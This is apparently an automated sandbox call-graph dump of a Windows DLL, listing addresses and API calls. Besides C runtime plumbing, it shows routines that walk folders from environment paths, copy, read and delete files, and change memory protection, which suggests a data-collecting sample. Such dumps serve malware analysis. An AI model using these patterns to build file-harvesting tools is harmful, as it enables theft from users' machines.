100087c4 GetStringTypeW 7432->7434 7433->7426 7434->7429 7436 100054a7 __fassign 38 API calls 7435->7436 7437 10008a51 7436->7437 7444 10008821 7437->7444 7441 1000880d 7440->7441 7442 1000881e 7440->7442 7441->7442 7443 1000571e _free 20 API calls 7441->7443 7442->7433 7443->7442 7446 1000883c 7444->7446 7445 10008862 MultiByteToWideChar 7447 1000888c 7445->7447 7458 10008a16 7445->7458 7446->7445 7452 100056d0 21 API calls 7447->7452 7454 100088ad 7447->7454 7448 10002ada _ValidateLocalCookies 5 API calls 7449 10006b87 7448->7449 7449->7419 7450 100088f6 MultiByteToWideChar 7451 10008962 7450->7451 7453 1000890f 7450->7453 7456 10008801 __freea 20 API calls 7451->7456 7452->7454 7471 10005f19 7453->7471 7454->7450 7454->7451 7456->7458 7458->7448 7459 10008971 7461 100056d0 21 API calls 7459->7461 7464 10008992 7459->7464 7460 10008939 7460->7451 7462 10005f19 11 API calls 7460->7462 7461->7464 7462->7451 7463 10008a07 7466 10008801 __freea 20 API calls 7463->7466 7464->7463 7465 10005f19 11 API calls 7464->7465 7467 100089e6 7465->7467 7466->7451 7467->7463 7468 100089f5 WideCharToMultiByte 7467->7468 7468->7463 7469 10008a35 7468->7469 7470 10008801 __freea 20 API calls 7469->7470 7470->7451 7472 10005c45 _abort 5 API calls 7471->7472 7473 10005f40 7472->7473 7476 10005f49 7473->7476 7479 10005fa1 7473->7479 7477 10002ada _ValidateLocalCookies 5 API calls 7476->7477 7478 10005f9b 7477->7478 7478->7451 7478->7459 7478->7460 7480 10005c45 _abort 5 API calls 7479->7480 7481 10005fc8 7480->7481 7482 10002ada _ValidateLocalCookies 5 API calls 7481->7482 7483 10005f89 LCMapStringW 7482->7483 7483->7476 7485 10006892 ___scrt_is_nonwritable_in_current_image 7484->7485 7492 10005671 RtlEnterCriticalSection 7485->7492 7487 1000689c 7493 100068f1 7487->7493 7491 100068b5 _abort 7491->7410 7492->7487 7505 10007011 7493->7505 7495 1000693f 7496 10007011 26 API calls 7495->7496 7497 1000695b 7496->7497 7498 10007011 26 API calls 7497->7498 7499 10006979 7498->7499 7500 100068a9 7499->7500 7501 1000571e _free 20 API calls 7499->7501 7502 100068bd 7500->7502 7501->7500 7519 100056b9 RtlLeaveCriticalSection 7502->7519 7504 100068c7 7504->7491 7506 10007022 7505->7506 7515 1000701e 7505->7515 7507 10007029 7506->7507 7511 1000703c ___scrt_fastfail 7506->7511 7508 10006368 __dosmaperr 20 API calls 7507->7508 7509 1000702e 7508->7509 7510 100062ac _abort 26 API calls 7509->7510 7510->7515 7512 10007073 7511->7512 7513 1000706a 7511->7513 7511->7515 7512->7515 7517 10006368 __dosmaperr 20 API calls 7512->7517 7514 10006368 __dosmaperr 20 API calls 7513->7514 7516 1000706f 7514->7516 7515->7495 7518 100062ac _abort 26 API calls 7516->7518 7517->7516 7518->7515 7519->7504 6295 1000220c 6296 10002215 6295->6296 6297 1000221a dllmain_dispatch 6295->6297 6299 100022b1 6296->6299 6300 100022c7 6299->6300 6301 100022d0 6300->6301 6303 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6300->6303 6301->6297 6303->6301 7224 1000724e GetProcessHeap 7225 1000284f 7226 10002882 std::exception::exception 27 API calls 7225->7226 7227 1000285d 7226->7227 7524 10003c90 RtlUnwind 7622 100036d0 7623 100036e2 7622->7623 7625 100036f0 @_EH4_CallFilterFunc@8 7622->7625 7624 10002ada _ValidateLocalCookies 5 API calls 7623->7624 7624->7625 7228 10005351 7229 10005360 7228->7229 7233 10005374 7228->7233 7231 1000571e _free 20 API calls 7229->7231 7229->7233 7230 1000571e _free 20 API calls 7232 10005386 7230->7232 7231->7233 7234 1000571e _free 20 API calls 7232->7234 7233->7230 7235 10005399 7234->7235 7236 1000571e _free 20 API calls 7235->7236 7237 100053aa 7236->7237 7238 1000571e _free 20 API calls 7237->7238 7239 100053bb 7238->7239 7626 100073d5 7627 100073e1 ___scrt_is_nonwritable_in_current_image 7626->7627 7638 10005671 RtlEnterCriticalSection 7627->7638 7629 100073e8 7630 10008be3 27 API calls 7629->7630 7631 100073f7 7630->7631 7637 10007406 7631->7637 7639 10007269 GetStartupInfoW 7631->7639 7635 10007417 _abort 7636 1000731f 2 API calls 7636->7637 7645 10007422 7637->7645 7638->7629 7640 10007286 7639->7640 7641 10007318 7639->7641 7640->7641 7642 10008be3 27 API calls 7640->7642 7641->7636 7643 100072af 7642->7643 7643->7641 7644 100072dd GetFileType 7643->7644 7644->7643 7648 100056b9 RtlLeaveCriticalSection 7645->7648 7647 10007429 7647->7635 7648->7647 7649 10004ed7 7650 10006d60 51 API calls 7649->7650 7651 10004ee9 7650->7651 7660 10007153 GetEnvironmentStringsW 7651->7660 7655 1000571e _free 20 API calls 7657 10004f29 7655->7657 7656 10004eff 7658 1000571e _free 20 API calls 7656->7658 7659 10004ef4 7658->7659 7659->7655 7661 1000716a 7660->7661 7671 100071bd 7660->7671 7664 10007170 WideCharToMultiByte 7661->7664 7662 100071c6 FreeEnvironmentStringsW 7663 10004eee 7662->7663 7663->7659 7672 10004f2f 7663->7672 7665 1000718c 7664->7665 7664->7671 7666 100056d0 21 API calls 7665->7666 7667 10007192 7666->7667 7668 100071af 7667->7668 7669 10007199 WideCharToMultiByte 7667->7669 7670 1000571e _free 20 API calls 7668->7670 7669->7668 7670->7671 7671->7662 7671->7663 7674 10004f44 7672->7674 7673 1000637b _abort 20 API calls 7683 10004f6b 7673->7683 7674->7673 7675 10004fcf 7676 1000571e _free 20 API calls 7675->7676 7677 10004fe9 7676->7677 7677->7656 7678 1000637b _abort 20 API calls 7678->7683 7679 10004fd1 7680 10005000 20 API calls 7679->7680 7682 10004fd7 7680->7682 7681 1000544d ___std_exception_copy 26 API calls 7681->7683 7684 1000571e _free 20 API calls 7682->7684 7683->7675 7683->7678 7683->7679 7683->7681 7685 10004ff3 7683->7685 7687 1000571e _free 20 API calls 7683->7687 7684->7675 7686 100062bc _abort 11 API calls 7685->7686 7688 10004fff 7686->7688 7687->7683 6456 10002418 6457 10002420 ___scrt_release_startup_lock 6456->6457 6460 100047f5 6457->6460 6459 10002448 6461 10004804 6460->6461 6462 10004808 6460->6462 6461->6459 6465 10004815 6462->6465 6466 10005b7a _abort 20 API calls 6465->6466 6469 1000482c 6466->6469 6467 10002ada _ValidateLocalCookies 5 API calls 6468 10004811 6467->6468 6468->6459 6469->6467 7525 10004a9a 7528 10005411 7525->7528 7529 1000541d _abort 7528->7529 7530 10005af6 _abort 38 API calls 7529->7530 7533 10005422 7530->7533 7531 100055a8 _abort 38 API calls 7532 1000544c 7531->7532 7533->7531 5876 10001c5b 5877 10001c6b ___scrt_fastfail 5876->5877 5880 100012ee 5877->5880 5879 10001c87 5881 10001324 ___scrt_fastfail 5880->5881 5882 100013b7 GetEnvironmentVariableW 5881->5882 5906 100010f1 5882->5906 5885 100010f1 57 API calls 5886 10001465 5885->5886 5887 100010f1 57 API calls 5886->5887 5888 10001479 5887->5888 5889 100010f1 57 API calls 5888->5889 5890 1000148d 5889->5890 5891 100010f1 57 API calls 5890->5891 5892 100014a1 5891->5892 5893 100010f1 57 API calls 5892->5893 5894 100014b5 lstrlenW 5893->5894 5895 100014d2 5894->5895 5896 100014d9 lstrlenW 5894->5896 5895->5879 5897 100010f1 57 API calls 5896->5897 5898 10001501 lstrlenW lstrcatW 5897->5898 5899 100010f1 57 API calls 5898->5899 5900 10001539 lstrlenW lstrcatW 5899->5900 5901 100010f1 57 API calls 5900->5901 5902 1000156b lstrlenW lstrcatW 5901->5902 5903 100010f1 57 API calls 5902->5903 5904 1000159d lstrlenW lstrcatW 5903->5904 5905 100010f1 57 API calls 5904->5905 5905->5895 5907 10001118 ___scrt_fastfail 5906->5907 5908 10001129 lstrlenW 5907->5908 5919 10002c40 5908->5919 5910 10001148 lstrcatW lstrlenW 5911 10001177 lstrlenW FindFirstFileW 5910->5911 5912 10001168 lstrlenW 5910->5912 5913 100011a0 5911->5913 5914 100011e1 5911->5914 5912->5911 5915 100011c7 FindNextFileW 5913->5915 5916 100011aa 5913->5916 5914->5885 5915->5913 5917 100011da FindClose 5915->5917 5916->5915 5921 10001000 5916->5921 5917->5914 5920 10002c57 5919->5920 5920->5910 5920->5920 5922 10001022 ___scrt_fastfail 5921->5922 5923 100010af 5922->5923 5924 1000102f lstrcatW lstrlenW 5922->5924 5927 100010b5 lstrlenW 5923->5927 5937 100010ad 5923->5937 5925 1000105a lstrlenW 5924->5925 5926 1000106b lstrlenW 5924->5926 5925->5926 5938 10001e89 lstrlenW 5926->5938 5952 10001e16 5927->5952 5930 10001088 GetFileAttributesW 5933 1000109c 5930->5933 5930->5937 5931 100010ca 5932 10001e89 5 API calls 5931->5932 5931->5937 5934 100010df 5932->5934 5933->5937 5944 1000173a 5933->5944 5957 100011ea 5934->5957 5937->5916 5939 10002c40 ___scrt_fastfail 5938->5939 5940 10001ea7 lstrcatW lstrlenW 5939->5940 5941 10001ed1 lstrcatW 5940->5941 5942 10001ec2 5940->5942 5941->5930 5942->5941 5943 10001ec7 lstrlenW 5942->5943 5943->5941 5945 10001747 ___scrt_fastfail 5944->5945 5972 10001cca 5945->5972 5949 1000199f 5949->5937 5950 10001824 ___scrt_fastfail _strlen 5950->5949 5992 100015da 5950->5992 5953 10001e29 5952->5953 5956 10001e4c 5952->5956 5954 10001e2d lstrlenW 5953->5954 5953->5956 5955 10001e3f lstrlenW 5954->5955 5954->5956 5955->5956 5956->5931 5958 1000120e ___scrt_fastfail 5957->5958 5959 10001e89 5 API calls 5958->5959 5960 10001220 GetFileAttributesW 5959->5960 5961 10001235 5960->5961 5962 10001246 5960->5962 5961->5962 5964 1000173a 35 API calls 5961->5964 5963 10001e89 5 API calls 5962->5963 5965 10001258 5963->5965 5964->5962 5966 100010f1 56 API calls 5965->5966 5967 1000126d 5966->5967 5968 10001e89 5 API calls 5967->5968 5969 1000127f ___scrt_fastfail 5968->5969 5970 100010f1 56 API calls 5969->5970 5971 100012e6 5970->5971 5971->5937 5973 10001cf1 ___scrt_fastfail 5972->5973 5974 10001d0f CopyFileW CreateFileW 5973->5974 5975 10001d44 DeleteFileW 5974->5975 5976 10001d55 GetFileSize 5974->5976 5981 10001808 5975->5981 5977 10001ede 22 API calls 5976->5977 5978 10001d66 ReadFile 5977->5978 5979 10001d94 CloseHandle DeleteFileW 5978->5979 5980 10001d7d CloseHandle DeleteFileW 5978->5980 5979->5981 5980->5981 5981->5949 5982 10001ede 5981->5982 5984 1000222f 5982->5984 5985 1000224e 5984->5985 5987 10002250 5984->5987 6000 1000474f 5984->6000 6005 100047e5 5984->6005 5985->5950 5988 10002908 5987->5988 6012 100035d2 5987->6012 5989 100035d2 __CxxThrowException@8 RaiseException 5988->5989 5990 10002925 5989->5990 5990->5950 5993 1000160c _strcat _strlen 5992->5993 5994 1000163c lstrlenW 5993->5994 6100 10001c9d 5994->6100 5996 10001655 lstrcatW lstrlenW 5997 10001678 5996->5997 5998 1000167e lstrcatW 5997->5998 5999 10001693 ___scrt_fastfail 5997->5999 5998->5999 5999->5950 6015 10004793 6000->6015 6003 1000478f 6003->5984 6004 10004765 6021 10002ada 6004->6021 6010 100056d0 _abort 6005->6010 6006 1000570e 6034 10006368 6006->6034 6007 100056f9 RtlAllocateHeap 6009 1000570c 6007->6009 6007->6010 6009->5984 6010->6006 6010->6007 6011 1000474f _abort 7 API calls 6010->6011 6011->6010 6014 100035f2 RaiseException 6012->6014 6014->5988 6016 1000479f ___scrt_is_nonwritable_in_current_image 6015->6016 6028 10005671 RtlEnterCriticalSection 6016->6028 6018 100047aa 6029 100047dc 6018->6029 6020 100047d1 _abort 6020->6004 6022 10002ae3 6021->6022 6023 10002ae5 IsProcessorFeaturePresent 6021->6023 6022->6003 6025 10002b58 6023->6025 6033 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6025->6033 6027 10002c3b 6027->6003 6028->6018 6032 100056b9 RtlLeaveCriticalSection 6029->6032 6031 100047e3 6031->6020 6032->6031 6033->6027 6037 10005b7a GetLastError 6034->6037 6038 10005b93 6037->6038 6039 10005b99 6037->6039 6056 10005e08 6038->6056 6043 10005bf0 SetLastError 6039->6043 6063 1000637b 6039->6063 6045 10005bf9 6043->6045 6045->6009 6046 10005bb3 6070 1000571e 6046->6070 6049 10005bb9 6051 10005be7 SetLastError 6049->6051 6050 10005bcf 6083 1000593c 6050->6083 6051->6045 6054 1000571e _free 17 API calls 6055 10005be0 6054->6055 6055->6043 6055->6051 6088 10005c45 6056->6088 6058 10005e2f 6059 10005e47 TlsGetValue 6058->6059 6060 10005e3b 6058->6060 6059->6060 6061 10002ada _ValidateLocalCookies 5 API calls 6060->6061 6062 10005e58 6061->6062 6062->6039 6068 10006388 _abort 6063->6068 6064 100063b3 RtlAllocateHeap 6066 10005bab 6064->6066 6064->6068 6065 100063c8 6067 10006368 __dosmaperr 19 API calls 6065->6067 6066->6046 6076 10005e5e 6066->6076 6067->6066 6068->6064 6068->6065 6069 1000474f _abort 7 API calls 6068->6069 6069->6068 6071 10005752 __dosmaperr 6070->6071 6072 10005729 HeapFree 6070->6072 6071->6049 6072->6071 6073 1000573e 6072->6073 6074 10006368 __dosmaperr 18 API calls 6073->6074 6075 10005744 GetLastError 6074->6075 6075->6071 6077 10005c45 _abort 5 API calls 6076->6077 6078 10005e85 6077->6078 6079 10005ea0 TlsSetValue 6078->6079 6080 10005e94 6078->6080 6079->6080 6081 10002ada _ValidateLocalCookies 5 API calls 6080->6081 6082 10005bc8 6081->6082 6082->6046 6082->6050 6094 10005914 6083->6094 6089 10005c71 6088->6089 6090 10005c75 __crt_fast_encode_pointer 6088->6090 6089->6090 6091 10005ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6089->6091 6093 10005c95 6089->6093 6090->6058 6091->6089 6092 10005ca1 GetProcAddress 6092->6090 6093->6090 6093->6092 6095 10005854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6094->6095 6096 10005938 6095->6096 6097 100058c4 6096->6097 6098 10005758 _abort 20 API calls 6097->6098 6099 100058e8 6098->6099 6099->6054 6101 10001ca6 _strlen 6100->6101 6101->5996 6102 100020db 6105 100020e7 ___scrt_is_nonwritable_in_current_image 6102->6105 6103 100020f6 6104 10002110 dllmain_raw 6104->6103 6106 1000212a 6104->6106 6105->6103 6105->6104 6110 1000210b 6105->6110 6115 10001eec 6106->6115 6108 10002177 6108->6103 6109 10001eec 31 API calls 6108->6109 6111 1000218a 6109->6111 6110->6103 6110->6108 6113 10001eec 31 API calls 6110->6113 6111->6103 6112 10002193 dllmain_raw 6111->6112 6112->6103 6114 1000216d dllmain_raw 6113->6114 6114->6108 6116 10001ef7 6115->6116 6117 10001f2a dllmain_crt_process_detach 6115->6117 6118 10001f1c dllmain_crt_process_attach 6116->6118 6119 10001efc 6116->6119 6120 10001f06 6117->6120 6118->6120 6121 10001f01 6119->6121 6122 10001f12 6119->6122 6120->6110 6121->6120 6125 1000240b 6121->6125 6130 100023ec 6122->6130 6138 100053e5 6125->6138 6277 10003513 6130->6277 6133 100023f5 6133->6120 6136 10002408 6136->6120 6137 1000351e 7 API calls 6137->6133 6144 10005aca 6138->6144 6141 1000351e 6248 10003820 6141->6248 6143 10002415 6143->6120 6145 10005ad4 6144->6145 6148 10002410 6144->6148 6146 10005e08 _abort 11 API calls 6145->6146 6147 10005adb 6146->6147 6147->6148 6149 10005e5e _abort 11 API calls 6147->6149 6148->6141 6150 10005aee 6149->6150 6152 100059b5 6150->6152 6153 100059c0 6152->6153 6154 100059d0 6152->6154 6158 100059d6 6153->6158 6154->6148 6157 1000571e _free 20 API calls 6157->6154 6159 100059ef 6158->6159 6160 100059e9 6158->6160 6162 1000571e _free 20 API calls 6159->6162 6161 1000571e _free 20 API calls 6160->6161 6161->6159 6163 100059fb 6162->6163 6164 1000571e _free 20 API calls 6163->6164 6165 10005a06 6164->6165 6166 1000571e _free 20 API calls 6165->6166 6167 10005a11 6166->6167 6168 1000571e _free 20 API calls 6167->6168 6169 10005a1c 6168->6169 6170 1000571e _free 20 API calls 6169->6170 6171 10005a27 6170->6171 6172 1000571e _free 20 API calls 6171->6172 6173 10005a32 6172->6173 6174 1000571e _free 20 API calls 6173->6174 6175 10005a3d 6174->6175 6176 1000571e _free 20 API calls 6175->6176 6177 10005a48 6176->6177 6178 1000571e _free 20 API calls 6177->6178 6179 10005a56 6178->6179 6184 1000589c 6179->6184 6190 100057a8 6184->6190 6186 100058c0 6187 100058ec 6186->6187 6203 10005809 6187->6203 6189 10005910 6189->6157 6191 100057b4 ___scrt_is_nonwritable_in_current_image 6190->6191 6198 10005671 RtlEnterCriticalSection 6191->6198 6193 100057be 6196 1000571e _free 20 API calls 6193->6196 6197 100057e8 6193->6197 6195 100057f5 _abort 6195->6186 6196->6197 6199 100057fd 6197->6199 6198->6193 6202 100056b9 RtlLeaveCriticalSection 6199->6202 6201 10005807 6201->6195 6202->6201 6204 10005815 ___scrt_is_nonwritable_in_current_image 6203->6204 6211 10005671 RtlEnterCriticalSection 6204->6211 6206 1000581f 6212 10005a7f 6206->6212 6208 10005832 6216 10005848 6208->6216 6210 10005840 _abort 6210->6189 6211->6206 6213 10005a8e __fassign 6212->6213 6215 10005ab5 __fassign 6212->6215 6213->6215 6219 10007cc2 6213->6219 6215->6208 6247 100056b9 RtlLeaveCriticalSection 6216->6247 6218 10005852 6218->6210 6220 10007d42 6219->6220 6223 10007cd8 6219->6223 6221 10007d90 6220->6221 6224 1000571e _free 20 API calls 6220->6224 6222 10007e35 __fassign 20 API calls 6221->6222 6237 10007d9e 6222->6237 6223->6220 6225 10007d0b 6223->6225 6230 1000571e _free 20 API calls 6223->6230 6226 10007d64 6224->6226 6227 10007d2d 6225->6227 6232 1000571e _free 20 API calls 6225->6232 6228 1000571e _free 20 API calls 6226->6228 6229 1000571e _free 20 API calls 6227->6229 6231 10007d77 6228->6231 6234 10007d37 6229->6234 6236 10007d00 6230->6236 6233 1000571e _free 20 API calls 6231->6233 6238 10007d22 6232->6238 6239 10007d85 6233->6239 6240 1000571e _free 20 API calls 6234->6240 6235 10007dfe 6241 1000571e _free 20 API calls 6235->6241 6242 100090ba ___free_lconv_mon 20 API calls 6236->6242 6237->6235 6245 1000571e 20 API calls _free 6237->6245 6243 100091b8 __fassign 20 API calls 6238->6243 6244 1000571e _free 20 API calls 6239->6244 6240->6220 6246 10007e04 6241->6246 6242->6225 6243->6227 6244->6221 6245->6237 6246->6215 6247->6218 6249 1000384b ___vcrt_freefls@4 6248->6249 6251 1000382d 6248->6251 6249->6143 6250 1000383b 6259 10003ba2 6250->6259 6251->6250 6254 10003b67 6251->6254 6264 10003a82 6254->6264 6256 10003b81 6257 10003b99 TlsGetValue 6256->6257 6258 10003b8d 6256->6258 6257->6258 6258->6250 6260 10003a82 try_get_function 5 API calls 6259->6260 6261 10003bbc 6260->6261 6262 10003bd7 TlsSetValue 6261->6262 6263 10003bcb 6261->6263 6262->6263 6263->6249 6265 10003aaa 6264->6265 6269 10003aa6 __crt_fast_encode_pointer 6264->6269 6265->6269 6270 100039be 6265->6270 6268 10003ac4 GetProcAddress 6268->6269 6269->6256 6275 100039cd try_get_first_available_module 6270->6275 6271 10003a77 6271->6268 6271->6269 6272 100039ea LoadLibraryExW 6273 10003a05 GetLastError 6272->6273 6272->6275 6273->6275 6274 10003a60 FreeLibrary 6274->6275 6275->6271 6275->6272 6275->6274 6276 10003a38 LoadLibraryExW 6275->6276 6276->6275 6283 10003856 6277->6283 6279 100023f1 6279->6133 6280 100053da 6279->6280 6281 10005b7a _abort 20 API calls 6280->6281 6282 100023fd 6281->6282 6282->6136 6282->6137 6284 10003862 GetLastError 6283->6284 6285 1000385f 6283->6285 6286 10003b67 ___vcrt_FlsGetValue 6 API calls 6284->6286 6285->6279 6287 10003877 6286->6287 6288 100038dc SetLastError 6287->6288 6289 10003ba2 ___vcrt_FlsSetValue 6 API calls 6287->6289 6294 10003896 6287->6294 6288->6279 6290 10003890 6289->6290 6291 100038b8 6290->6291 6292 10003ba2 ___vcrt_FlsSetValue 6 API calls 6290->6292 6290->6294 6293 10003ba2 ___vcrt_FlsSetValue 6 API calls 6291->6293 6291->6294 6292->6291 6293->6294 6294->6288 6470 1000281c 6473 10002882 6470->6473 6476 10003550 6473->6476 6475 1000282a 6477 1000358a 6476->6477 6478 1000355d 6476->6478 6477->6475 6478->6477 6479 100047e5 ___std_exception_copy 21 API calls 6478->6479 6480 1000357a 6479->6480 6480->6477 6482 1000544d 6480->6482 6483 1000545a 6482->6483 6485 10005468 6482->6485 6483->6485 6489 1000547f 6483->6489 6484 10006368 __dosmaperr 20 API calls 6486 10005470 6484->6486 6485->6484 6491 100062ac 6486->6491 6488 1000547a 6488->6477 6489->6488 6490 10006368 __dosmaperr 20 API calls 6489->6490 6490->6486 6494 10006231 6491->6494 6493 100062b8 6493->6488 6495 10005b7a _abort 20 API calls 6494->6495 6496 10006247 6495->6496 6497 100062a6 6496->6497 6499 10006255 6496->6499 6505 100062bc IsProcessorFeaturePresent 6497->6505 6503 10002ada _ValidateLocalCookies 5 API calls 6499->6503 6500 100062ab 6501 10006231 _abort 26 API calls 6500->6501 6502 100062b8 6501->6502 6502->6493 6504 1000627c 6503->6504 6504->6493 6506 100062c7 6505->6506 6509 100060e2 6506->6509 6510 100060fe ___scrt_fastfail 6509->6510 6511 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6510->6511 6514 100061fb ___scrt_fastfail 6511->6514 6512 10002ada _ValidateLocalCookies 5 API calls 6513 10006219 GetCurrentProcess TerminateProcess 6512->6513 6513->6500 6514->6512 7689 10004bdd 7690 10004c08 7689->7690 7691 10004bec 7689->7691 7692 10006d60 51 API calls 7690->7692 7691->7690 7693 10004bf2 7691->7693 7695 10004c0f GetModuleFileNameA 7692->7695 7694 10006368 __dosmaperr 20 API calls 7693->7694 7696 10004bf7 7694->7696 7697 10004c33 7695->7697 7698 100062ac _abort 26 API calls 7696->7698 7712 10004d01 7697->7712 7699 10004c01 7698->7699 7704 10004c72 7706 10004d01 38 API calls 7704->7706 7705 10004c66 7707 10006368 __dosmaperr 20 API calls 7705->7707 7710 10004c88 7706->7710 7708 10004c6b 7707->7708 7709 1000571e _free 20 API calls 7708->7709 7709->7699 7710->7708 7711 1000571e _free 20 API calls 7710->7711 7711->7708 7714 10004d26 7712->7714 7716 10004d86 7714->7716 7724 100070eb 7714->7724 7715 10004c50 7718 10004e76 7715->7718 7716->7715 7717 100070eb 38 API calls 7716->7717 7717->7716 7719 10004e8b 7718->7719 7720 10004c5d 7718->7720 7719->7720 7721 1000637b _abort 20 API calls 7719->7721 7720->7704 7720->7705 7722 10004eb9 7721->7722 7723 1000571e _free 20 API calls 7722->7723 7723->7720 7727 10007092 7724->7727 7728 100054a7 __fassign 38 API calls 7727->7728 7729 100070a6 7728->7729 7729->7714 7240 10007260 GetStartupInfoW 7241 10007286 7240->7241 7243 10007318 7240->7243 7241->7243 7246 10008be3 7241->7246 7244 100072af 7244->7243 7245 100072dd GetFileType 7244->7245 7245->7244 7247 10008bef ___scrt_is_nonwritable_in_current_image 7246->7247 7248 10008c13 7247->7248 7249 10008bfc 7247->7249 7259 10005671 RtlEnterCriticalSection 7248->7259 7251 10006368 __dosmaperr 20 API calls 7249->7251 7252 10008c01 7251->7252 7253 100062ac _abort 26 API calls 7252->7253 7254 10008c0b _abort 7253->7254 7254->7244 7255 10008c4b 7267 10008c72 7255->7267 7258 10008c1f 7258->7255 7260 10008b34 7258->7260 7259->7258 7261 1000637b _abort 20 API calls 7260->7261 7262 10008b46 7261->7262 7264 10005eb7 11 API calls 7262->7264 7266 10008b53 7262->7266 7263 1000571e _free 20 API calls 7265 10008ba5 7263->7265 7264->7262 7265->7258 7266->7263 7270 100056b9 RtlLeaveCriticalSection 7267->7270 7269 10008c79 7269->7254 7270->7269 7534 100081a0 7535 100081d9 7534->7535 7536 100081dd 7535->7536 7547 10008205 7535->7547 7537 10006368 __dosmaperr 20 API calls 7536->7537 7539 100081e2 7537->7539 7538 10008529 7540 10002ada _ValidateLocalCookies 5 API calls 7538->7540 7541 100062ac _abort 26 API calls 7539->7541 7542 10008536 7540->7542 7543 100081ed 7541->7543 7544 10002ada _ValidateLocalCookies 5 API calls 7543->7544 7546 100081f9 7544->7546 7547->7538 7548 100080c0 7547->7548 7549 100080db 7548->7549 7550 10002ada _ValidateLocalCookies 5 API calls 7549->7550 7551 10008152 7550->7551 7551->7547 7730 1000a1e0 7733 1000a1fe 7730->7733 7732 1000a1f6 7734 1000a203 7733->7734 7735 1000a298 7734->7735 7736 1000aa53 21 API calls 7734->7736 7735->7732 7737 1000a42f 7736->7737 7737->7732 7271 10009d61 7272 10009d81 7271->7272 7275 10009db8 7272->7275 7274 10009dab 7277 10009dbf 7275->7277 7276 10009e20 7278 1000aa17 21 API calls 7276->7278 7279 1000a90e 7276->7279 7277->7276 7281 10009ddf 7277->7281 7280 10009e6e 7278->7280 7279->7274 7280->7274 7281->7279 7282 1000aa17 21 API calls 7281->7282 7283 1000a93e 7282->7283 7283->7274 7552 100021a1 ___scrt_dllmain_exception_filter 5844 1000c7a7 5845 1000c7be 5844->5845 5850 1000c82c 5844->5850 5845->5850 5856 1000c7e6 GetModuleHandleA 5845->5856 5847 1000c872 5848 1000c835 GetModuleHandleA 5851 1000c83f 5848->5851 5849 1000c7dd 5849->5850 5849->5851 5853 1000c800 GetProcAddress 5849->5853 5850->5847 5850->5848 5850->5851 5851->5850 5852 1000c85f GetProcAddress 5851->5852 5852->5850 5853->5850 5854 1000c80d VirtualProtect 5853->5854 5854->5850 5855 1000c81c VirtualProtect 5854->5855 5855->5850 5857 1000c7ef 5856->5857 5863 1000c82c 5856->5863 5868 1000c803 GetProcAddress 5857->5868 5859 1000c7f4 5862 1000c800 GetProcAddress 5859->5862 5859->5863 5860 1000c872 5861 1000c835 GetModuleHandleA 5867 1000c83f 5861->5867 5862->5863 5864 1000c80d VirtualProtect 5862->5864 5863->5860 5863->5861 5863->5867 5864->5863 5865 1000c81c VirtualProtect 5864->5865 5865->5863 5866 1000c85f GetProcAddress 5866->5863 5867->5863 5867->5866 5869 1000c82c 5868->5869 5870 1000c80d VirtualProtect 5868->5870 5872 1000c872 5869->5872 5873 1000c835 GetModuleHandleA 5869->5873 5870->5869 5871 1000c81c VirtualProtect 5870->5871 5871->5869 5875 1000c83f 5873->5875 5874 1000c85f GetProcAddress 5874->5875 5875->5869 5875->5874 6515 1000742b 6516 10007430 6515->6516 6517 10007453 6516->6517 6519 10008bae 6516->6519 6520 10008bdd 6519->6520 6521 10008bbb 6519->6521 6520->6516 6522 10008bd7 6521->6522 6523 10008bc9 RtlDeleteCriticalSection 6521->6523 6524 1000571e _free 20 API calls 6522->6524 6523->6522 6523->6523 6524->6520 7284 1000ac6b 7285 1000ac84 __startOneArgErrorHandling 7284->7285 7287 1000acad __startOneArgErrorHandling 7285->7287 7288 1000b2f0 7285->7288 7289 1000b329 __startOneArgErrorHandling 7288->7289 7290 1000b5c1 __raise_exc RaiseException 7289->7290 7291 1000b350 __startOneArgErrorHandling 7289->7291 7290->7291 7292 1000b393 7291->7292 7293 1000b36e 7291->7293 7294 1000b8b2 __startOneArgErrorHandling 20 API calls 7292->7294 7299 1000b8e1 7293->7299 7296 1000b38e __startOneArgErrorHandling 7294->7296 7297 10002ada _ValidateLocalCookies 5 API calls 7296->7297 7298 1000b3b7 7297->7298 7298->7287 7300 1000b8f0 7299->7300 7301 1000b90f __startOneArgErrorHandling 7300->7301 7302 1000b964 __startOneArgErrorHandling 7300->7302 7303 100078a3 __startOneArgErrorHandling 5 API calls 7301->7303 7304 1000b8b2 __startOneArgErrorHandling 20 API calls 7302->7304 7305 1000b950 7303->7305 7307 1000b95d 7304->7307 7306 1000b8b2 __startOneArgErrorHandling 20 API calls 7305->7306 7305->7307 7306->7307 7307->7296 7553 100060ac 7554 100060b7 7553->7554 7556 100060dd 7553->7556 7555 100060c7 FreeLibrary 7554->7555 7554->7556 7555->7554 7308 1000506f 7309 10005081 7308->7309 7310 10005087 7308->7310 7311 10005000 20 API calls 7309->7311 7311->7310 6525 10005630 6528 1000563b 6525->6528 6527 10005664 6538 10005688 6527->6538 6528->6527 6529 10005660 6528->6529 6531 10005eb7 6528->6531 6532 10005c45 _abort 5 API calls 6531->6532 6533 10005ede 6532->6533 6534 10005efc InitializeCriticalSectionAndSpinCount 6533->6534 6535 10005ee7 6533->6535 6534->6535 6536 10002ada _ValidateLocalCookies 5 API calls 6535->6536 6537 10005f13 6536->6537 6537->6528 6539 100056b4 6538->6539 6540 10005695 6538->6540 6539->6529 6541 1000569f RtlDeleteCriticalSection 6540->6541 6541->6539 6541->6541 7312 10003370 7323 10003330 7312->7323 7324 10003342 7323->7324 7325 1000334f 7323->7325 7326 10002ada _ValidateLocalCookies 5 API calls 7324->7326 7326->7325 7738 100063f0 7739 10006400 7738->7739 7740 10006416 7738->7740 7741 10006368 __dosmaperr 20 API calls 7739->7741 7750 10006561 7740->7750 7751 10006480 7740->7751 7757 10006580 7740->7757 7742 10006405 7741->7742 7743 100062ac _abort 26 API calls 7742->7743 7745 1000640f 7743->7745 7744 10004e76 20 API calls 7748 100064e5 7744->7748 7746 100064ee 7749 1000571e _free 20 API calls 7746->7749 7748->7746 7754 10006573 7748->7754 7768 100085eb 7748->7768 7749->7750 7777 1000679a 7750->7777 7751->7744 7755 100062bc _abort 11 API calls 7754->7755 7756 1000657f 7755->7756 7758 1000658c 7757->7758 7758->7758 7759 1000637b _abort 20 API calls 7758->7759 